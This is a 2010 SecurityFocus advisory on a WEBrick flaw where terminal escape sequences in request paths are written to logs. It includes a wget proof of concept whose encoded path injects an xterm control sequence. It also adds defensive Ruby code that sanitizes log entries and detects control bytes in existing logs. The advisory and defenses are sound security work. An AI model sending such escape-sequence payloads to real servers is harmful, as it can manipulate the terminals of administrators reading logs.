Ruby WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability

Attackers can exploit this issue with readily available tools.

The following example is available:

% xterm -e ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port=>8080).start' &
% wget http://www.example.com:8080/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
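
The bytes in that request path are an xterm title-setting sequence (ESC ] 2 ; ... BEL) followed by a line feed. Once WEBrick copies them into its log, anyone who views the log with cat, tail or less hands them to the terminal. The following Ruby is an added defensive example; it is not part of the advisory and not Ruby's own fix. It shows the two controls a maintainer wants: a sanitizer that escapes every control byte before a log line is written, and a detector for logs already on disk. The SanitizingLog class and the sample log line are this example's own constructions; the :AccessLog option and COMMON_LOG_FORMAT constant it mentions are WEBrick's.

```ruby
require 'stringio'

# Control bytes a terminal acts on when a log line is displayed with cat,
# tail or less -r: the C0 range (ESC, BEL, CR, LF, ...), DEL, and the
# single-byte C1 CSI (0x9B) that many terminals accept in place of ESC [.
# Matched on raw bytes (/n) so that any, or invalid, encoding is handled.
CONTROL_BYTES = /[\x00-\x1f\x7f\x9b]/n

# Mitigation: rewrite every control byte as \xNN so the stored line stays
# plain text regardless of what the client put in the request.
def sanitize_log_field(str)
  str.b.gsub(CONTROL_BYTES) { |c| format('\x%02X', c.ord) }
end

# Detection: true when an already-written log line carries bytes that could
# drive the terminal of whoever views it.
def suspicious_log_line?(line)
  !(line.b.chomp =~ CONTROL_BYTES).nil?
end

# Minimal percent-decoder, used only to show the bytes the advisory's
# request path turns into once decoded.
def percent_decode(path)
  path.gsub(/%([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
end

# Access-log destination that sanitizes before writing. WEBrick calls `<<`
# with one formatted entry per request on each destination listed in its
# :AccessLog option, e.g.
#   :AccessLog => [[SanitizingLog.new($stderr), WEBrick::AccessLog::COMMON_LOG_FORMAT]]
# (:AccessLog and COMMON_LOG_FORMAT are WEBrick's; this class is the example's).
class SanitizingLog
  def initialize(io)
    @io = io
  end

  def <<(entry)
    @io << sanitize_log_field(entry.to_s.chomp) << "\n"
    self
  end
end

# Constructed sample: the path from the advisory's wget request, and a
# common-log-format line as it would look once that path reached the log.
ADVISORY_PATH = '/%1b%5d%32%3b%6f%77%6e%65%64%07%0a'
SAMPLE_LOG_LINE = "127.0.0.1 - - [01/Jan/2010:00:00:00 +0000] " \
                  "\"GET #{percent_decode(ADVISORY_PATH)} HTTP/1.0\" 404 0"

if __FILE__ == $PROGRAM_NAME
  # Only the sanitized form is printed, so running this never touches the
  # terminal state.
  puts "suspicious? #{suspicious_log_line?(SAMPLE_LOG_LINE)}"
  puts sanitize_log_field(SAMPLE_LOG_LINE)
  buf = StringIO.new(''.b)
  SanitizingLog.new(buf) << (SAMPLE_LOG_LINE + "\n")
  puts buf.string
end
```

Escaping on the server side is the durable fix because it does not depend on how the log is later read; the detector is for the logs that were written before the fix was in place, for example as a one-off scan run with `File.foreach(path).select { |l| suspicious_log_line?(l) }`.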


 

Copyright 2010, SecurityFocus